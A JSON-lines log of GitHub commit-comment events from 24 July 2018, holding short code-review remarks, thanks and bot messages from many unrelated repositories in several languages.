{"id":"8009607054","type":"CommitCommentEvent","actor":{"login":"mechoigame"},"repo":{"name":"insanelydeepak/Patched-AppleHDA-for-Mac-OS-Sierra-10.12"},"payload":{"comment":{"id":29812978,"position":null,"line":null,"path":null,"commit_id":"f4e4dd5319614ebdb945c742168af323f9f12e62","created_at":"2018-07-24T11:42:52Z","updated_at":"2018-07-24T11:42:52Z","author_association":"NONE","body":"thanks"}},"created_at":"2018-07-24T11:42:52Z"}
{"id":"8009616670","type":"CommitCommentEvent","actor":{"login":"jduriez"},"repo":{"name":"yade/trunk"},"payload":{"comment":{"id":29812990,"position":null,"line":null,"path":null,"commit_id":"947a84dca63c8a0001c24b62cbe1b3837e087d73","created_at":"2018-07-24T11:44:54Z","updated_at":"2018-07-24T11:44:54Z","author_association":"CONTRIBUTOR","body":"Sorry..."}},"created_at":"2018-07-24T11:44:54Z"}
{"id":"8009617674","type":"CommitCommentEvent","actor":{"login":"fooker"},"repo":{"name":"f-breidenstein/CptHook"},"payload":{"comment":{"id":29812992,"position":33,"line":33,"path":"simple.go","commit_id":"98c7fa6a462d436437ff581b18fcc9d715b775d0","created_at":"2018-07-24T11:45:06Z","updated_at":"2018-07-24T11:45:06Z","author_association":"CONTRIBUTOR","body":"Good point. But IMO they should be handled in the other side of the channel."}},"created_at":"2018-07-24T11:45:06Z"}
{"id":"8009623188","type":"CommitCommentEvent","actor":{"login":"EsromTech"},"repo":{"name":"TrollUserInterface/android_frameworks_base"},"payload":{"comment":{"id":29813003,"position":null,"line":null,"path":null,"commit_id":"48865ff42a331f82cff4c7a62b24768028c3de3f","created_at":"2018-07-24T11:46:12Z","updated_at":"2018-07-24T11:46:12Z","author_association":"NONE","body":"Hahaha nice text Bro."}},"created_at":"2018-07-24T11:46:12Z"}
{"id":"8009623954","type":"CommitCommentEvent","actor":{"login":"ChehotsRepublicOfCATV95"},"repo":{"name":"ChehotsRepublicOfCATV95/TXTEDIT"},"payload":{"comment":{"id":29813007,"position":null,"line":null,"path":null,"commit_id":"ea3c3ae320c276a18c8f13e6f0ed67ce9f9a6342","created_at":"2018-07-24T11:46:23Z","updated_at":"2018-07-24T11:46:23Z","author_association":"OWNER","body":"Printing is still not yet supported for now."}},"created_at":"2018-07-24T11:46:23Z"}
{"id":"8009624968","type":"CommitCommentEvent","actor":{"login":"NEDCampDev"},"repo":{"name":"NEDCamp/nedcamp"},"payload":{"comment":{"id":29813009,"position":null,"line":null,"path":null,"commit_id":"8d04d0d3a8165f1f0c25cbf7991561e8da6333e3","created_at":"2018-07-24T11:46:37Z","updated_at":"2018-07-24T11:46:37Z","author_association":"COLLABORATOR","body":"Created multidev environment [nedcamp#ci-167](https://dashboard.pantheon.io/sites/1e9ab33c-01d3-42bd-bb42-5008333172a3#ci-167).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-167-nedcamp.pantheonsite.io/)"}},"created_at":"2018-07-24T11:46:37Z"}
{"id":"8009628128","type":"CommitCommentEvent","actor":{"login":"persianpros"},"repo":{"name":"PLi-metas/servicemp3epl"},"payload":{"comment":{"id":29813011,"position":null,"line":null,"path":null,"commit_id":"944a52f9dc43578a199229e4b1074e9dcfe4fec4","created_at":"2018-07-24T11:47:19Z","updated_at":"2018-07-24T11:47:19Z","author_association":"MEMBER","body":"I think you need to update this repo :)"}},"created_at":"2018-07-24T11:47:19Z"}
{"id":"8009630089","type":"CommitCommentEvent","actor":{"login":"holfordm"},"repo":{"name":"bodleian/medieval-mss"},"payload":{"comment":{"id":29813017,"position":null,"line":null,"path":null,"commit_id":"eba174397433f76c3ae765a38165073a67201540","created_at":"2018-07-24T11:47:46Z","updated_at":"2018-07-24T11:47:46Z","author_association":"COLLABORATOR","body":"Sorry: don't know how that happened. Should be fixed now."}},"created_at":"2018-07-24T11:47:46Z"}
{"id":"8009639218","type":"CommitCommentEvent","actor":{"login":"mweinelt"},"repo":{"name":"f-breidenstein/CptHook"},"payload":{"comment":{"id":29813033,"position":33,"line":null,"path":"simple.go","commit_id":"98c7fa6a462d436437ff581b18fcc9d715b775d0","created_at":"2018-07-24T11:49:49Z","updated_at":"2018-07-24T11:49:49Z","author_association":"NONE","body":"I don't disagree. At some point we need to make sure the Interface handles splitting of long lines and message queueing/throttling."}},"created_at":"2018-07-24T11:49:49Z"}
{"id":"8009639547","type":"CommitCommentEvent","actor":{"login":"jaison8940"},"repo":{"name":"jaison8940/CPP-problems"},"payload":{"comment":{"id":29813035,"position":null,"line":null,"path":null,"commit_id":"fff6e9493023b7e441292bb7a1696685594f24b3","created_at":"2018-07-24T11:49:54Z","updated_at":"2018-07-24T11:49:54Z","author_association":"OWNER","body":"Example:\r\ninput: 10\r\noutput: 1010"}},"created_at":"2018-07-24T11:49:54Z"}
{"id":"8009645711","type":"CommitCommentEvent","actor":{"login":"himu007"},"repo":{"name":"KomodoPlatform/komodo"},"payload":{"comment":{"id":29813052,"position":null,"line":null,"path":null,"commit_id":"3a4954d14e2992c01d90e604eb257c71c1f565c7","created_at":"2018-07-24T11:51:17Z","updated_at":"2018-07-24T11:51:17Z","author_association":"COLLABORATOR","body":"Looks good to me :+1: "}},"created_at":"2018-07-24T11:51:17Z"}
{"id":"8009646208","type":"CommitCommentEvent","actor":{"login":"ronnix"},"repo":{"name":"betagouv/zam"},"payload":{"comment":{"id":29813054,"position":5,"line":5,"path":"repondeur/setup.cfg","commit_id":"fef4cc3f1ac7fd73284307fac38bbef8b7fad231","created_at":"2018-07-24T11:51:23Z","updated_at":"2018-07-24T11:51:23Z","author_association":"COLLABORATOR","body":"👍 "}},"created_at":"2018-07-24T11:51:23Z"}
{"id":"8009648545","type":"CommitCommentEvent","actor":{"login":"steadfasterX"},"repo":{"name":"M0Rf30/android-udev-rules"},"payload":{"comment":{"id":29813061,"position":null,"line":null,"path":null,"commit_id":"d19fdc3815f507e3a1a142b3423dbacdb48ca80d","created_at":"2018-07-24T11:51:54Z","updated_at":"2018-07-24T11:51:54Z","author_association":"NONE","body":"@M0Rf30 why do you have removed adb_usb.ini?"}},"created_at":"2018-07-24T11:51:54Z"}
{"id":"8009648701","type":"CommitCommentEvent","actor":{"login":"semihalf-ostruszka-andrzej"},"repo":{"name":"Semihalf/marvell-dpdk"},"payload":{"comment":{"id":29813062,"position":180,"line":382,"path":"drivers/net/lport/rte_eth_lport_pmd.c","commit_id":"0f9a24b117fa5163411fe87047c388196620050a","created_at":"2018-07-24T11:51:56Z","updated_at":"2018-07-24T11:51:56Z","author_association":"NONE","body":"I thought initially about that but I don't want to have this dynamic check here.  For the moment I ignored the problem but the best would be to have static assert (it depends on configured headroom).  I see that there are examples of using static_assert in DPDK so I will assume it is granted that the compiler is modern enough and will use it:\r\n\r\nstatic_assert(RTE_PKTMBUF_HEADROOM >= 4, \"Not enough headroom configured\")"}},"created_at":"2018-07-24T11:51:56Z"}
{"id":"8009651133","type":"CommitCommentEvent","actor":{"login":"himu007"},"repo":{"name":"KomodoPlatform/KomodoPlatform"},"payload":{"comment":{"id":29813072,"position":null,"line":null,"path":null,"commit_id":"2ec4e39124f7932f1d119acc3057b33b346087d2","created_at":"2018-07-24T11:52:25Z","updated_at":"2018-07-24T11:52:25Z","author_association":"COLLABORATOR","body":"ACK. Looks good :+1: "}},"created_at":"2018-07-24T11:52:25Z"}
{"id":"8009652417","type":"CommitCommentEvent","actor":{"login":"gfgtdf"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":29813076,"position":null,"line":null,"path":null,"commit_id":"d911268a783467842d38eae7ac1630f1fea41318","created_at":"2018-07-24T11:52:42Z","updated_at":"2018-07-24T11:52:42Z","author_association":"CONTRIBUTOR","body":"i added a test for this now, to make sure it won't bw borken somehow, i wanted to do this anyways."}},"created_at":"2018-07-24T11:52:42Z"}
{"id":"8009667461","type":"CommitCommentEvent","actor":{"login":"mazharwebdev"},"repo":{"name":"mazharwebdev/last-dept"},"payload":{"comment":{"id":29813116,"position":null,"line":null,"path":null,"commit_id":"43d61b67969cebb3e28afde7827abe4ae1e18943","created_at":"2018-07-24T11:55:57Z","updated_at":"2018-07-24T11:55:57Z","author_association":"OWNER","body":"Nice"}},"created_at":"2018-07-24T11:55:57Z"}
{"id":"8009667897","type":"CommitCommentEvent","actor":{"login":"flashpixx"},"repo":{"name":"NAIM-Tech/naim-tech.github.io"},"payload":{"comment":{"id":29813117,"position":null,"line":null,"path":null,"commit_id":"65736c0a59a9c58cb668f823ff7dd40878cb5c95","created_at":"2018-07-24T11:56:02Z","updated_at":"2018-07-24T11:56:02Z","author_association":"CONTRIBUTOR","body":"da ich anhand des Diffs nicht nachvollziehen kann, was sich in der SVG geändert hat und die Graffle-Datei nicht dazu passend geändert wurde, reverte ich diesen Commit"}},"created_at":"2018-07-24T11:56:02Z"}
{"id":"8009671732","type":"CommitCommentEvent","actor":{"login":"pasimann"},"repo":{"name":"pasimann/lounasvahti"},"payload":{"comment":{"id":29813120,"position":11,"line":10,"path":"src/cron.ts","commit_id":"aa4b110ad66f2bf918a05c280449322d12387d16","created_at":"2018-07-24T11:56:53Z","updated_at":"2018-07-24T11:56:53Z","author_association":"OWNER","body":"Ehkä tuo timezone parametrina tuolle CronJobille, niin se tietää että sille parametrina annettu CRON_PATTERN pitää suorittaa Helsinki-aikavyöhykkeellä klo 8:30 ma-pe. Nyt se suorittaa sen UTC-ajassa (ja tuo aiempi 6:30 pattern-määrityksessä toi viestin 8:30 talvella ja 9:30 kesällä).\r\nhttps://github.com/kelektiv/node-cron#for-good-measure\r\n"}},"created_at":"2018-07-24T11:56:53Z"}
{"id":"8009672308","type":"CommitCommentEvent","actor":{"login":"fiskeben"},"repo":{"name":"fiskeben/bmp085"},"payload":{"comment":{"id":29813123,"position":null,"line":null,"path":null,"commit_id":"a964efa2a993d04e2a1b19e82288de094bde68a8","created_at":"2018-07-24T11:57:01Z","updated_at":"2018-07-24T11:57:01Z","author_association":"OWNER","body":"@rzr Thank you for your contributions!\r\nI'm working on a 2.0 with ES6 support and Promises (possibly async/await, too). This will go into master and the current version will live on in the [1.x branch](https://github.com/fiskeben/bmp085/tree/1.x).\r\nLet me know if you're interested in testing it (or even helping out)."}},"created_at":"2018-07-24T11:57:01Z"}
{"id":"8009674561","type":"CommitCommentEvent","actor":{"login":"AnnieYousar"},"repo":{"name":"openssl/openssl"},"payload":{"comment":{"id":29813132,"position":null,"line":null,"path":null,"commit_id":"e29889e71311bfc58a49a2aea5e216315dd2955c","created_at":"2018-07-24T11:57:29Z","updated_at":"2018-07-24T11:57:29Z","author_association":"NONE","body":"THX."}},"created_at":"2018-07-24T11:57:29Z"}
{"id":"8009674856","type":"CommitCommentEvent","actor":{"login":"kristalls"},"repo":{"name":"kristalls/thinkneticaRoR"},"payload":{"comment":{"id":29813133,"position":8,"line":8,"path":"lesson2/buyers_list.rb","commit_id":"92d91dc53c0cb342d4d32e22099cc19a4804ec0e","created_at":"2018-07-24T11:57:33Z","updated_at":"2018-07-24T11:57:33Z","author_association":"OWNER","body":"Не совсем понял что мне нужно сделать тут.\r\n"}},"created_at":"2018-07-24T11:57:33Z"}
{"id":"8009676941","type":"CommitCommentEvent","actor":{"login":"semihalf-ostruszka-andrzej"},"repo":{"name":"Semihalf/marvell-dpdk"},"payload":{"comment":{"id":29813137,"position":207,"line":401,"path":"drivers/net/lport/rte_eth_lport_pmd.c","commit_id":"0f9a24b117fa5163411fe87047c388196620050a","created_at":"2018-07-24T11:58:01Z","updated_at":"2018-07-24T11:58:01Z","author_association":"NONE","body":"OK will do"}},"created_at":"2018-07-24T11:58:01Z"}
{"id":"8009677870","type":"CommitCommentEvent","actor":{"login":"Ram2119"},"repo":{"name":"guh/linux-imx6-3.14-tune"},"payload":{"comment":{"id":29813138,"position":null,"line":null,"path":null,"commit_id":"8ad29ad1aab91e18c29853fd273cc0e2fbe8388b","created_at":"2018-07-24T11:58:13Z","updated_at":"2018-07-24T11:58:13Z","author_association":"NONE","body":"Hi t-mon,\r\n\r\nAre these steps are enough to bring up mipi dsi lcd display on imX6 ?\r\n\r\nThanks"}},"created_at":"2018-07-24T11:58:13Z"}
{"id":"8009681241","type":"CommitCommentEvent","actor":{"login":"lzyprime"},"repo":{"name":"lzyprime/gitlearn"},"payload":{"comment":{"id":29813141,"position":null,"line":null,"path":null,"commit_id":"544b08fadd09fc4f3a7138a1dbf58eb3bfdbf617","created_at":"2018-07-24T11:58:56Z","updated_at":"2018-07-24T11:58:56Z","author_association":"OWNER","body":"theme"}},"created_at":"2018-07-24T11:58:56Z"}
{"id":"8009684369","type":"CommitCommentEvent","actor":{"login":"BenDol"},"repo":{"name":"GwtMaterialDesign/gwt-material"},"payload":{"comment":{"id":29813146,"position":15,"line":143,"path":"gwt-material/src/main/java/gwt/material/design/client/ui/MaterialDropDown.java","commit_id":"09f5d5b3762fa0fb689d09f90577522f7612bc39","created_at":"2018-07-24T11:59:35Z","updated_at":"2018-07-24T11:59:35Z","author_association":"COLLABORATOR","body":"I think there is an separate issue. In some cases even when you click out of the dropdown (blur) the box doesn't disappear.\r\n\r\nI think this might not be the entire fix."}},"created_at":"2018-07-24T11:59:35Z"}
{"id":"8009684680","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddtBeppu/introPython3_beppu"},"payload":{"comment":{"id":29813148,"position":19,"line":21,"path":"e11/e11_04/pop_by_lucy.py","commit_id":"fcd0b5c2de93a9a7354a679c09fd29841e26d0d5","created_at":"2018-07-24T11:59:38Z","updated_at":"2018-07-24T11:59:38Z","author_association":"COLLABORATOR","body":"待ち時間は定数(pythonに定数はなかったと思うので変数かな？)として持っておきたいです。(石井)"}},"created_at":"2018-07-24T11:59:38Z"}
{"id":"8009687987","type":"CommitCommentEvent","actor":{"login":"leostrakosch"},"repo":{"name":"sosy-lab/java-common-lib"},"payload":{"comment":{"id":29813158,"position":null,"line":null,"path":null,"commit_id":"859dc016d24ce92dc98d48ae118662d757cf6bf6","created_at":"2018-07-24T12:00:18Z","updated_at":"2018-07-24T12:00:18Z","author_association":"CONTRIBUTOR","body":"It's not just the jars that should be included in the classpath, but also the dependencies required for compilation, so `build`, `runtime` and `test` are required.\r\nI thought that a single entry would be simpler, but if you prefer that, I can add these three directories instead.\r\nCould there be any conflicts or other problems through including `spotbugs`, `checkstyle` and `format-source`?\r\n"}},"created_at":"2018-07-24T12:00:18Z"}
{"id":"8009689278","type":"CommitCommentEvent","actor":{"login":"alexey-lysiuk"},"repo":{"name":"OrdinaryMagician/gzdoom"},"payload":{"comment":{"id":29813161,"position":5,"line":101,"path":"src/posix/sdl/sdlglvideo.cpp","commit_id":"f287e99f968c740819b6d61000865589fbbe387c","created_at":"2018-07-24T12:00:32Z","updated_at":"2018-07-24T12:00:32Z","author_association":"NONE","body":"Please do not start names with underscore."}},"created_at":"2018-07-24T12:00:32Z"}
{"id":"8009690370","type":"CommitCommentEvent","actor":{"login":"mjudeikis"},"repo":{"name":"jim-minter/azure-helm"},"payload":{"comment":{"id":29813165,"position":24,"line":161,"path":"pkg/addons/clean.go","commit_id":"38e1b54af5ca14dd07c5369163704a5e7a869667","created_at":"2018-07-24T12:00:45Z","updated_at":"2018-07-24T12:00:45Z","author_association":"CONTRIBUTOR","body":"This was an idea. Idea is that for other services we were cleaning some of the metadata in `Clean()`  it ran fine, until I started testing with more complex service objects. "}},"created_at":"2018-07-24T12:00:45Z"}
{"id":"8009690887","type":"CommitCommentEvent","actor":{"login":"kondors1995"},"repo":{"name":"nicknitewolf/kernel_xiaomi_msm8953"},"payload":{"comment":{"id":29813167,"position":null,"line":null,"path":null,"commit_id":"e51f8ccaac27cc21c89791ba112205c692b589fe","created_at":"2018-07-24T12:00:52Z","updated_at":"2018-07-24T12:00:52Z","author_association":"NONE","body":"Do you got it booting? "}},"created_at":"2018-07-24T12:00:52Z"}
{"id":"8009694914","type":"CommitCommentEvent","actor":{"login":"djom1709"},"repo":{"name":"Taiiwo/bitcoin-signature-tool"},"payload":{"comment":{"id":29813179,"position":null,"line":null,"path":null,"commit_id":"11abbacb61a4f5d18fa0110ebdea3f30eb633ec1","created_at":"2018-07-24T12:01:40Z","updated_at":"2018-07-24T12:01:40Z","author_association":"NONE","body":"Link wallet address LXKBQqBHuQsiLLntppWEBjRnADKW9oZLVU to CoinPot account dnarimov1709@gmail.com"}},"created_at":"2018-07-24T12:01:40Z"}
{"id":"8009696591","type":"CommitCommentEvent","actor":{"login":"maruel"},"repo":{"name":"google/periph"},"payload":{"comment":{"id":29813183,"position":null,"line":null,"path":null,"commit_id":"efe6fe1a0a43d65b02129dfede1a25f045f98477","created_at":"2018-07-24T12:02:02Z","updated_at":"2018-07-24T12:02:02Z","author_association":"MEMBER","body":"Ok let met do a proper PR."}},"created_at":"2018-07-24T12:02:02Z"}
{"id":"8009698849","type":"CommitCommentEvent","actor":{"login":"alexey-lysiuk"},"repo":{"name":"OrdinaryMagician/gzdoom"},"payload":{"comment":{"id":29813190,"position":22,"line":197,"path":"src/posix/sdl/sdlglvideo.cpp","commit_id":"f287e99f968c740819b6d61000865589fbbe387c","created_at":"2018-07-24T12:02:31Z","updated_at":"2018-07-24T12:02:31Z","author_association":"NONE","body":"`else` block is useless as static variables are filled with zeroes.\r\nIt's better to use `nullptr` too."}},"created_at":"2018-07-24T12:02:31Z"}
{"id":"8009699465","type":"CommitCommentEvent","actor":{"login":"yunusyavuz12"},"repo":{"name":"yunusyavuz12/generat_r"},"payload":{"comment":{"id":29813192,"position":null,"line":null,"path":null,"commit_id":"2338d56759cf2d60b8d3dc39cd05be9e52fbb5c4","created_at":"2018-07-24T12:02:38Z","updated_at":"2018-07-24T12:02:38Z","author_association":"OWNER","body":"\r\n+\r\n+Copyright (c) 2018, yunusyavuz12\r\n+All rights reserved.\r\n+\r\n+Redistribution and use in source and binary forms, with or without\r\n+modification, are permitted provided that the following conditions are met:\r\n+\r\n+* Redistributions of source code must retain the above copyright notice, this\r\n+  list of conditions and the following disclaimer.\r\n+\r\n+* Redistributions in binary form must reproduce the above copyright notice,\r\n+  this list of conditions and the following disclaimer in the documentation\r\n+  and/or other materials provided with the distribution.\r\n+\r\n+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\r\n+AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\r\n+IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\r\n+DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE\r\n+FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\r\n+DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\r\n+SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\r\n+CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\r\n+OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\r\n+OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE."}},"created_at":"2018-07-24T12:02:38Z"}
{"id":"8009700819","type":"CommitCommentEvent","actor":{"login":"semihalf-ostruszka-andrzej"},"repo":{"name":"Semihalf/marvell-dpdk"},"payload":{"comment":{"id":29813197,"position":255,"line":441,"path":"drivers/net/lport/rte_eth_lport_pmd.c","commit_id":"0f9a24b117fa5163411fe87047c388196620050a","created_at":"2018-07-24T12:02:55Z","updated_at":"2018-07-24T12:02:55Z","author_association":"NONE","body":"As for the need for the check I've sent an email to resolve this point.\r\nAs for the freeing packets not retagged it goes more or less like:\r\n- retag goes through the list of packets and keeps those valid at the beginning of the buffer returning the number of valid ones\r\n- tx_burst attempts to send just this number\r\n- the actual number sent is returned to user and what user application do in such cases is that they free unsent packets themselves."}},"created_at":"2018-07-24T12:02:55Z"}
{"id":"8009705300","type":"CommitCommentEvent","actor":{"login":"dtretyakov"},"repo":{"name":"JetBrains/teamcity-cloudformation-template"},"payload":{"comment":{"id":29813205,"position":420,"line":296,"path":"teamcity-server.yaml","commit_id":"42cd2396b75543a84b4aa9378accabba8eda32ef","created_at":"2018-07-24T12:03:47Z","updated_at":"2018-07-24T12:03:47Z","author_association":"CONTRIBUTOR","body":"@ekoshkin, is it true that now distribution type `aws` is no more reported there?"}},"created_at":"2018-07-24T12:03:47Z"}
{"id":"8009706037","type":"CommitCommentEvent","actor":{"login":"alexey-lysiuk"},"repo":{"name":"OrdinaryMagician/gzdoom"},"payload":{"comment":{"id":29813206,"position":null,"line":null,"path":null,"commit_id":"f287e99f968c740819b6d61000865589fbbe387c","created_at":"2018-07-24T12:03:56Z","updated_at":"2018-07-24T12:03:56Z","author_association":"NONE","body":"In general, I would rather add `GetWindowBordersSize()` to `SystemGLFrameBuffer` and handle everything inside this class."}},"created_at":"2018-07-24T12:03:56Z"}
{"id":"8009707152","type":"CommitCommentEvent","actor":{"login":"semihalf-ostruszka-andrzej"},"repo":{"name":"Semihalf/marvell-dpdk"},"payload":{"comment":{"id":29813208,"position":421,"line":961,"path":"drivers/net/lport/rte_eth_lport_pmd.c","commit_id":"0f9a24b117fa5163411fe87047c388196620050a","created_at":"2018-07-24T12:04:11Z","updated_at":"2018-07-24T12:04:11Z","author_association":"NONE","body":"OK"}},"created_at":"2018-07-24T12:04:11Z"}
{"id":"8009708338","type":"CommitCommentEvent","actor":{"login":"alexey-lysiuk"},"repo":{"name":"OrdinaryMagician/gzdoom"},"payload":{"comment":{"id":29813210,"position":37,"line":283,"path":"src/posix/sdl/sdlglvideo.cpp","commit_id":"f287e99f968c740819b6d61000865589fbbe387c","created_at":"2018-07-24T12:04:24Z","updated_at":"2018-07-24T12:04:24Z","author_association":"NONE","body":"This assignment is pretty useless."}},"created_at":"2018-07-24T12:04:24Z"}
{"id":"8009709669","type":"CommitCommentEvent","actor":{"login":"datreeio[bot]"},"repo":{"name":"codefresh-io/demochat"},"payload":{"comment":{"id":29813214,"position":null,"line":null,"path":null,"commit_id":"edea3af09c2cbf416b10a1de7884759088c04444","created_at":"2018-07-24T12:04:40Z","updated_at":"2018-07-24T12:04:40Z","author_association":"NONE","body":"\n:crown: Good job! this pull request is aligned with your organization's best practices!\n:speak_no_evil: We don’t have additional insights for this pull request"}},"created_at":"2018-07-24T12:04:40Z"}
{"id":"8009709790","type":"CommitCommentEvent","actor":{"login":"datreeio[bot]"},"repo":{"name":"codefresh-io/demochat"},"payload":{"comment":{"id":29813215,"position":null,"line":null,"path":null,"commit_id":"edea3af09c2cbf416b10a1de7884759088c04444","created_at":"2018-07-24T12:04:42Z","updated_at":"2018-07-24T12:04:42Z","author_association":"NONE","body":"\n:crown: Good job! this pull request is aligned with your organization's best practices!\n:speak_no_evil: We don’t have additional insights for this pull request"}},"created_at":"2018-07-24T12:04:42Z"}
{"id":"8009711325","type":"CommitCommentEvent","actor":{"login":"AlexHaxe"},"repo":{"name":"HaxeCheckstyle/haxe-formatter"},"payload":{"comment":{"id":29813219,"position":4,"line":36,"path":"test/TestMain.hx","commit_id":"984d3efe29c2a6ae15d8d2188412f71ef8e13d79","created_at":"2018-07-24T12:05:01Z","updated_at":"2018-07-24T12:05:01Z","author_association":"MEMBER","body":"https://github.com/HaxeFoundation/haxe/issues/7217"}},"created_at":"2018-07-24T12:05:01Z"}
{"id":"8009711647","type":"CommitCommentEvent","actor":{"login":"datreeio[bot]"},"repo":{"name":"codefresh-io/demochat"},"payload":{"comment":{"id":29813221,"position":null,"line":null,"path":null,"commit_id":"8a4228c6b3f2cdebe2e4a8693df4151978436fc0","created_at":"2018-07-24T12:05:05Z","updated_at":"2018-07-24T12:05:05Z","author_association":"NONE","body":"\n:crown: Good job! this pull request is aligned with your organization's best practices!\n:speak_no_evil: We don’t have additional insights for this pull request"}},"created_at":"2018-07-24T12:05:05Z"}
{"id":"8009712489","type":"CommitCommentEvent","actor":{"login":"acantosh"},"repo":{"name":"zszfrz/mapcamp"},"payload":{"comment":{"id":29813222,"position":8,"line":10,"path":"src/main/resources/templates/index.html","commit_id":"70f3b77935526425def8a6deca7046783e0de935","created_at":"2018-07-24T12:05:14Z","updated_at":"2018-07-24T12:05:14Z","author_association":"COLLABORATOR","body":"ここは全部削除しないでください。"}},"created_at":"2018-07-24T12:05:14Z"}
{"id":"8009715300","type":"CommitCommentEvent","actor":{"login":"kimmens"},"repo":{"name":"kimmens/CS1-Python-Ref-Syllabus"},"payload":{"comment":{"id":29813234,"position":null,"line":null,"path":null,"commit_id":"0fe794fce713ac26f91aebb9b7d034d09a4eb6e4","created_at":"2018-07-24T12:05:46Z","updated_at":"2018-07-24T12:05:46Z","author_association":"OWNER","body":"Being a relative newbie to using pull requests I'm trying to figure out how this works. If pull requests work well I will do it like that for now so that you can review my changes beforehand."}},"created_at":"2018-07-24T12:05:46Z"}
{"id":"8009716425","type":"CommitCommentEvent","actor":{"login":"Lipnevich"},"repo":{"name":"Lipnevich/noxbox"},"payload":{"comment":{"id":29813235,"position":7,"line":14,"path":"app/src/main/res/layout/activity_detailed_description.xml","commit_id":"b08f1401da6b9fbd393ef8a5e1e309ccaa45cc67","created_at":"2018-07-24T12:05:58Z","updated_at":"2018-07-24T12:05:58Z","author_association":"OWNER","body":"Please set theme in android manifest"}},"created_at":"2018-07-24T12:05:58Z"}
{"id":"8009718401","type":"CommitCommentEvent","actor":{"login":"acantosh"},"repo":{"name":"zszfrz/mapcamp"},"payload":{"comment":{"id":29813238,"position":95,"line":68,"path":"src/main/resources/templates/index.html","commit_id":"70f3b77935526425def8a6deca7046783e0de935","created_at":"2018-07-24T12:06:21Z","updated_at":"2018-07-24T12:06:21Z","author_association":"COLLABORATOR","body":"削除しないでください。"}},"created_at":"2018-07-24T12:06:21Z"}
{"id":"8009718435","type":"CommitCommentEvent","actor":{"login":"andrew-morrison"},"repo":{"name":"bodleian/medieval-mss"},"payload":{"comment":{"id":29813239,"position":null,"line":null,"path":null,"commit_id":"2b17ac4a7df76777496b290993bd059af68363e9","created_at":"2018-07-24T12:06:22Z","updated_at":"2018-07-24T12:06:22Z","author_association":"CONTRIBUTOR","body":"@holfordm: I fixed this one file, as it seemed obvious what the problem was, but the following are also not well-formed:\r\n\r\n* Merton_College_MS_55.xml\r\n* Merton_College_MS_57.xml\r\n* Merton_College_MS_60.xml\r\n\r\nAnd not all are obvious, so it would probably be better left to you."}},"created_at":"2018-07-24T12:06:22Z"}
{"id":"8009719376","type":"CommitCommentEvent","actor":{"login":"petervanderstok"},"repo":{"name":"core-wg/resource-directory"},"payload":{"comment":{"id":29813241,"position":null,"line":null,"path":null,"commit_id":"2c51255ef44e2dcb99694cb313f4a790a00a0378","created_at":"2018-07-24T12:06:32Z","updated_at":"2018-07-24T12:06:32Z","author_association":"CONTRIBUTOR","body":"Telling them in detail what to find where may work better than just citing RFC numbers.At least it does for me."}},"created_at":"2018-07-24T12:06:32Z"}
{"id":"8009727229","type":"CommitCommentEvent","actor":{"login":"kristalls"},"repo":{"name":"kristalls/thinkneticaRoR"},"payload":{"comment":{"id":29813263,"position":8,"line":8,"path":"lesson2/buyers_list.rb","commit_id":"92d91dc53c0cb342d4d32e22099cc19a4804ec0e","created_at":"2018-07-24T12:08:10Z","updated_at":"2018-07-24T12:08:10Z","author_association":"OWNER","body":"Не совсем понял этот момент.\r\n"}},"created_at":"2018-07-24T12:08:10Z"}
{"id":"8009730763","type":"CommitCommentEvent","actor":{"login":"ninibzh"},"repo":{"name":"MicBlizzard/Simulation"},"payload":{"comment":{"id":29813273,"position":null,"line":null,"path":null,"commit_id":"96749c14f2940856f996fde9552cac86d5ece52c","created_at":"2018-07-24T12:08:52Z","updated_at":"2018-07-24T12:08:52Z","author_association":"NONE","body":"awesome!!!\r\n"}},"created_at":"2018-07-24T12:08:52Z"}
{"id":"8009732647","type":"CommitCommentEvent","actor":{"login":"yonex8888"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29813276,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-24T12:09:16Z","updated_at":"2018-07-24T12:09:16Z","author_association":"NONE","body":"good project"}},"created_at":"2018-07-24T12:09:16Z"}
{"id":"8009734493","type":"CommitCommentEvent","actor":{"login":"acantosh"},"repo":{"name":"zszfrz/mapcamp"},"payload":{"comment":{"id":29813279,"position":14,"line":26,"path":"src/main/resources/templates/layout.html","commit_id":"70f3b77935526425def8a6deca7046783e0de935","created_at":"2018-07-24T12:09:37Z","updated_at":"2018-07-24T12:09:37Z","author_association":"COLLABORATOR","body":"ここも変更しないでください。"}},"created_at":"2018-07-24T12:09:37Z"}
{"id":"8009737934","type":"CommitCommentEvent","actor":{"login":"jdalrymple"},"repo":{"name":"jdalrymple/node-gitlab"},"payload":{"comment":{"id":29813287,"position":null,"line":null,"path":null,"commit_id":"f4f1aeefd1d3bb2d400dbc12cc570278c45ba63e","created_at":"2018-07-24T12:10:17Z","updated_at":"2018-07-24T12:10:17Z","author_association":"OWNER","body":"ill try that\r\n"}},"created_at":"2018-07-24T12:10:17Z"}
